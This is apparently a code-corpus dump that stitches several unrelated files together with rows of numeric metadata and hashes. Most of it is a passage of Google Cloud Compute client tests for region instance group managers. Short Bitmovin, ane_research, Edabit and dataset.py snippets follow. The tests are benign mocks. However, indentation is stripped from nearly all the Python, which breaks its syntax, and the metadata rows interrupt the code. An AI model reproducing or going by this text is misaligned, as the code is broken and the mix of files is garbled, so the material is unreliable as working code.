# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
size=443,
)
mock_args.update(sample_request)
client.resize(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/resize"
% client.transport._host,
args[1],
)
def test_resize_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.resize(
compute.ResizeRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
size=443,
)
def test_set_instance_template_rest(
transport: str = "rest",
request_type=compute.SetInstanceTemplateRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_set_template_request_resource"
] = compute.RegionInstanceGroupManagersSetTemplateRequest(
instance_template="instance_template_value"
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.set_instance_template(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_set_instance_template_rest_bad_request(
transport: str = "rest",
request_type=compute.SetInstanceTemplateRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_set_template_request_resource"
] = compute.RegionInstanceGroupManagersSetTemplateRequest(
instance_template="instance_template_value"
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.set_instance_template(request)
def test_set_instance_template_rest_from_dict():
test_set_instance_template_rest(request_type=dict)
def test_set_instance_template_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_set_template_request_resource=compute.RegionInstanceGroupManagersSetTemplateRequest(
instance_template="instance_template_value"
),
)
mock_args.update(sample_request)
client.set_instance_template(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/setInstanceTemplate"
% client.transport._host,
args[1],
)
def test_set_instance_template_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.set_instance_template(
compute.SetInstanceTemplateRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_set_template_request_resource=compute.RegionInstanceGroupManagersSetTemplateRequest(
instance_template="instance_template_value"
),
)
def test_set_target_pools_rest(
transport: str = "rest",
request_type=compute.SetTargetPoolsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_set_target_pools_request_resource"
] = compute.RegionInstanceGroupManagersSetTargetPoolsRequest(
fingerprint="fingerprint_value"
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.set_target_pools(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_set_target_pools_rest_bad_request(
transport: str = "rest",
request_type=compute.SetTargetPoolsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_set_target_pools_request_resource"
] = compute.RegionInstanceGroupManagersSetTargetPoolsRequest(
fingerprint="fingerprint_value"
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.set_target_pools(request)
def test_set_target_pools_rest_from_dict():
test_set_target_pools_rest(request_type=dict)
def test_set_target_pools_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_set_target_pools_request_resource=compute.RegionInstanceGroupManagersSetTargetPoolsRequest(
fingerprint="fingerprint_value"
),
)
mock_args.update(sample_request)
client.set_target_pools(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/setTargetPools"
% client.transport._host,
args[1],
)
def test_set_target_pools_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.set_target_pools(
compute.SetTargetPoolsRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_set_target_pools_request_resource=compute.RegionInstanceGroupManagersSetTargetPoolsRequest(
fingerprint="fingerprint_value"
),
)
def test_update_per_instance_configs_rest(
transport: str = "rest",
request_type=compute.UpdatePerInstanceConfigsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_manager_update_instance_config_req_resource"
] = compute.RegionInstanceGroupManagerUpdateInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.update_per_instance_configs(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_update_per_instance_configs_rest_bad_request(
transport: str = "rest",
request_type=compute.UpdatePerInstanceConfigsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_manager_update_instance_config_req_resource"
] = compute.RegionInstanceGroupManagerUpdateInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.update_per_instance_configs(request)
def test_update_per_instance_configs_rest_from_dict():
test_update_per_instance_configs_rest(request_type=dict)
def test_update_per_instance_configs_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_manager_update_instance_config_req_resource=compute.RegionInstanceGroupManagerUpdateInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
),
)
mock_args.update(sample_request)
client.update_per_instance_configs(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/updatePerInstanceConfigs"
% client.transport._host,
args[1],
)
def test_update_per_instance_configs_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_per_instance_configs(
compute.UpdatePerInstanceConfigsRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_manager_update_instance_config_req_resource=compute.RegionInstanceGroupManagerUpdateInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
),
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.RegionInstanceGroupManagersRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.RegionInstanceGroupManagersRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = RegionInstanceGroupManagersClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide scopes and a transport instance.
transport = transports.RegionInstanceGroupManagersRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = RegionInstanceGroupManagersClient(
client_options={"scopes": ["1", "2"]}, transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.RegionInstanceGroupManagersRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = RegionInstanceGroupManagersClient(transport=transport)
assert client.transport is transport
@pytest.mark.parametrize(
"transport_class", [transports.RegionInstanceGroupManagersRestTransport,]
)
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_region_instance_group_managers_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.RegionInstanceGroupManagersTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_region_instance_group_managers_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.compute_v1.services.region_instance_group_managers.transports.RegionInstanceGroupManagersTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.RegionInstanceGroupManagersTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"abandon_instances",
"apply_updates_to_instances",
"create_instances",
"delete",
"delete_instances",
"delete_per_instance_configs",
"get",
"insert",
"list",
"list_errors",
"list_managed_instances",
"list_per_instance_configs",
"patch",
"patch_per_instance_configs",
"recreate_instances",
"resize",
"set_instance_template",
"set_target_pools",
"update_per_instance_configs",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
def test_region_instance_group_managers_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.compute_v1.services.region_instance_group_managers.transports.RegionInstanceGroupManagersTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.RegionInstanceGroupManagersTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id="octopus",
)
def test_region_instance_group_managers_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
"google.cloud.compute_v1.services.region_instance_group_managers.transports.RegionInstanceGroupManagersTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.RegionInstanceGroupManagersTransport()
adc.assert_called_once()
def test_region_instance_group_managers_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
RegionInstanceGroupManagersClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id=None,
)
def test_region_instance_group_managers_http_transport_client_cert_source_for_mtls():
cred = ga_credentials.AnonymousCredentials()
with mock.patch(
"google.auth.transport.requests.AuthorizedSession.configure_mtls_channel"
) as mock_configure_mtls_channel:
transports.RegionInstanceGroupManagersRestTransport(
credentials=cred, client_cert_source_for_mtls=client_cert_source_callback
)
mock_configure_mtls_channel.assert_called_once_with(client_cert_source_callback)
def test_region_instance_group_managers_host_no_port():
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="compute.googleapis.com"
),
)
assert client.transport._host == "compute.googleapis.com:443"
def test_region_instance_group_managers_host_with_port():
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="compute.googleapis.com:8000"
),
)
assert client.transport._host == "compute.googleapis.com:8000"
def test_common_billing_account_path():
billing_account = "squid"
expected = "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
actual = RegionInstanceGroupManagersClient.common_billing_account_path(
billing_account
)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "clam",
}
path = RegionInstanceGroupManagersClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = RegionInstanceGroupManagersClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "whelk"
expected = "folders/{folder}".format(folder=folder,)
actual = RegionInstanceGroupManagersClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "octopus",
}
path = RegionInstanceGroupManagersClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = RegionInstanceGroupManagersClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "oyster"
expected = "organizations/{organization}".format(organization=organization,)
actual = RegionInstanceGroupManagersClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nudibranch",
}
path = RegionInstanceGroupManagersClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = RegionInstanceGroupManagersClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "cuttlefish"
expected = "projects/{project}".format(project=project,)
actual = RegionInstanceGroupManagersClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "mussel",
}
path = RegionInstanceGroupManagersClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = RegionInstanceGroupManagersClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "winkle"
location = "nautilus"
expected = "projects/{project}/locations/{location}".format(
project=project, location=location,
)
actual = RegionInstanceGroupManagersClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "scallop",
"location": "abalone",
}
path = RegionInstanceGroupManagersClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = RegionInstanceGroupManagersClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.RegionInstanceGroupManagersTransport, "_prep_wrapped_messages"
) as prep:
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.RegionInstanceGroupManagersTransport, "_prep_wrapped_messages"
) as prep:
transport_class = RegionInstanceGroupManagersClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
def test_transport_close():
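    # Maps each transport name to the session attribute whose close() the client context manager should trigger.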
transports = {
"rest": "_session",
}
for transport, close_name in transports.items():
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
with mock.patch.object(
type(getattr(client.transport, close_name)), "close"
) as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
"rest",
]
for transport in transports:
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
| 39.148252
| 144
| 0.687054
| 17,537
| 167,946
| 6.284028
| 0.026572
| 0.041796
| 0.041033
| 0.020689
| 0.925692
| 0.903732
| 0.886709
| 0.862
| 0.844569
| 0.833208
| 0
| 0.007054
| 0.234385
| 167,946
| 4,289
| 145
| 39.157379
| 0.85001
| 0.12251
| 0
| 0.747057
| 0
| 0.004226
| 0.149108
| 0.057455
| 0
| 0
| 0
| 0.000233
| 0.13613
| 1
| 0.040447
| false
| 0.000302
| 0.007244
| 0.000604
| 0.048295
| 0.005433
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1a18914c1c0a481ad16e079c4e8f3acd92019441
| 325
|
py
|
Python
|
bitmovin_api_sdk/encoding/outputs/s3_role_based/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 11
|
2019-07-03T10:41:16.000Z
|
2022-02-25T21:48:06.000Z
|
bitmovin_api_sdk/encoding/outputs/s3_role_based/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 8
|
2019-11-23T00:01:25.000Z
|
2021-04-29T12:30:31.000Z
|
bitmovin_api_sdk/encoding/outputs/s3_role_based/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 13
|
2020-01-02T14:58:18.000Z
|
2022-03-26T12:10:30.000Z
|
from bitmovin_api_sdk.encoding.outputs.s3_role_based.s3_role_based_api import S3RoleBasedApi
from bitmovin_api_sdk.encoding.outputs.s3_role_based.customdata.customdata_api import CustomdataApi
from bitmovin_api_sdk.encoding.outputs.s3_role_based.s3_role_based_output_list_query_params import S3RoleBasedOutputListQueryParams
| 81.25
| 131
| 0.923077
| 47
| 325
| 5.914894
| 0.382979
| 0.107914
| 0.197842
| 0.194245
| 0.553957
| 0.553957
| 0.553957
| 0.553957
| 0.553957
| 0.395683
| 0
| 0.022364
| 0.036923
| 325
| 3
| 132
| 108.333333
| 0.865815
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a7e6c053f57d6bd3d3b8bb6b7743fe3239d04b30
| 187
|
py
|
Python
|
ane_research/__init__.py
|
michaeljneely/sparse-attention-explanation
|
658b181f67963fe22dd0489bd9b37bdbd05110c1
|
[
"MIT"
] | 2
|
2020-03-25T22:13:09.000Z
|
2021-01-06T04:28:03.000Z
|
ane_research/__init__.py
|
michaeljneely/sparse-attention-explanation
|
658b181f67963fe22dd0489bd9b37bdbd05110c1
|
[
"MIT"
] | null | null | null |
ane_research/__init__.py
|
michaeljneely/sparse-attention-explanation
|
658b181f67963fe22dd0489bd9b37bdbd05110c1
|
[
"MIT"
] | null | null | null |
# pylint: disable=wildcard-import
from ane_research.dataset_readers import *
from ane_research.evaluators import *
from ane_research.models import *
from ane_research.predictors import *
| 31.166667
| 42
| 0.834225
| 25
| 187
| 6.04
| 0.48
| 0.264901
| 0.344371
| 0.556291
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101604
| 187
| 5
| 43
| 37.4
| 0.89881
| 0.165775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c511e4f0b50b3cd782e528a271318b95bf1188ac
| 43
|
py
|
Python
|
Edabit/Return a String as an Integer/Sol.py
|
Pandz18/C-Programs
|
9d9b47516d3f65d348f9f72b9c0edda8246e9fab
|
[
"MIT"
] | null | null | null |
Edabit/Return a String as an Integer/Sol.py
|
Pandz18/C-Programs
|
9d9b47516d3f65d348f9f72b9c0edda8246e9fab
|
[
"MIT"
] | null | null | null |
Edabit/Return a String as an Integer/Sol.py
|
Pandz18/C-Programs
|
9d9b47516d3f65d348f9f72b9c0edda8246e9fab
|
[
"MIT"
] | null | null | null |
def string_int(txt):
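    """Return the integer value of a numeric string."""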
return int(txt)
| 14.333333
| 21
| 0.651163
| 7
| 43
| 3.857143
| 0.714286
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.232558
| 43
| 2
| 22
| 21.5
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
3dbe76adabf689954d025f7840f192cd63c46e7a
| 8,833
|
py
|
Python
|
dataset.py
|
fengwuxuan/senet-3d
|
2de1465e5cf73b0223b0e3afa224c3734814ef3d
|
[
"MIT"
] | 9
|
2019-01-02T11:30:56.000Z
|
2021-05-17T11:55:17.000Z
|
dataset.py
|
fengwuxuan/senet-3d
|
2de1465e5cf73b0223b0e3afa224c3734814ef3d
|
[
"MIT"
] | 1
|
2020-09-24T07:29:33.000Z
|
2020-09-24T07:29:33.000Z
|
dataset.py
|
fengwuxuan/senet-3d
|
2de1465e5cf73b0223b0e3afa224c3734814ef3d
|
[
"MIT"
] | 1
|
2019-05-27T08:19:52.000Z
|
2019-05-27T08:19:52.000Z
|
from datasets.kinetics import Kinetics
from datasets.activitynet import ActivityNet
from datasets.ucf101 import UCF101
from datasets.hmdb51 import HMDB51
from datasets.something import Something
from datasets.fire import FIRE
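# Each factory below maps opt.dataset to the matching Dataset class and wires in the transforms supplied by the caller.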
